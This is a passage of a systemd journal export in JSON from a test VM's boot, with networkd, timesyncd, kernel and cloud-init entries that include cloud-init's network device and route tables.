"unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596024" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24e;b=e2b08827b5804427b422c10c84f1567e;m=27666f4;t=5bd16df39e65c;x=23d4c70eda3aa2af", "__REALTIME_TIMESTAMP" : "1615280815597148", "__MONOTONIC_TIMESTAMP" : "41314036", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "741", "CODE_FUNC" : "link_enter_configured", "MESSAGE" : "ens3: Configured", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596134" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24f;b=e2b08827b5804427b422c10c84f1567e;m=2768482;t=5bd16df3a03e9;x=44777783d090e933", "__REALTIME_TIMESTAMP" : "1615280815604713", "__MONOTONIC_TIMESTAMP" : "41321602", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321437", "MESSAGE" : "random: crng init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=250;b=e2b08827b5804427b422c10c84f1567e;m=27684fe;t=5bd16df3a0466;x=cb3c66b18efc86ff", "__REALTIME_TIMESTAMP" : "1615280815604838", "__MONOTONIC_TIMESTAMP" : "41321726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321439", "MESSAGE" : "random: 7 urandom warning(s) missed due to ratelimiting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=251;b=e2b08827b5804427b422c10c84f1567e;m=2768525;t=5bd16df3a048c;x=e3c199751aa14f5f", "__REALTIME_TIMESTAMP" : "1615280815604876", "__MONOTONIC_TIMESTAMP" : "41321765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=252;b=e2b08827b5804427b422c10c84f1567e;m=27686ad;t=5bd16df3a0615;x=984b8385613f98c2", "__REALTIME_TIMESTAMP" : "1615280815605269", "__MONOTONIC_TIMESTAMP" : "41322157", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_LINE" : "89", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "MESSAGE" : "managing: ens3", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=253;b=e2b08827b5804427b422c10c84f1567e;m=276899a;t=5bd16df3a0902;x=ce2869e8bb367c39", "__REALTIME_TIMESTAMP" : "1615280815606018", "__MONOTONIC_TIMESTAMP" : "41322906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "CODE_LINE" : "72", "MESSAGE" : "ignoring: lo", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598960" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=254;b=e2b08827b5804427b422c10c84f1567e;m=27689fb;t=5bd16df3a0963;x=cad5aeff3f93fbd8", "__REALTIME_TIMESTAMP" : "1615280815606115", "__MONOTONIC_TIMESTAMP" : "41323003", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "MESSAGE" : "Started Wait for Network to be Configured.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815601818" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=255;b=e2b08827b5804427b422c10c84f1567e;m=276a90f;t=5bd16df3a2877;x=3f8d6df4f98e116a", "__REALTIME_TIMESTAMP" : "1615280815614071", "__MONOTONIC_TIMESTAMP" : "41330959", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Initial cloud-init job (metadata service crawler)...", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815610953" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=256;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2f7facbcff3c248a", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init' at Tue, 09 Mar 2021 09:06:56 +0000. Up 41.82 seconds.", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=257;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=8cc996d422496cc0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=258;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=259;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=29b466862941ac8d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Device | Up | Address | Mask | Scope | Hw-Address |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2de0cabb7107f1d7", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | 192.168.10.95 | 255.255.255.0 | global | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25c;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=233b249cf336f0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | fe80::f816:3eff:fe55:6ae2/64 | . | link | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25d;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b46b42cabef260e0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25e;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=caac27a601f8a351", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | ::1/128 | . | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25f;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=260;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=4a33c63bdc09703d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: ++++++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=261;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=262;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a60f616505a8540b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=263;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=264;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=e6c753992d003dbc", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", 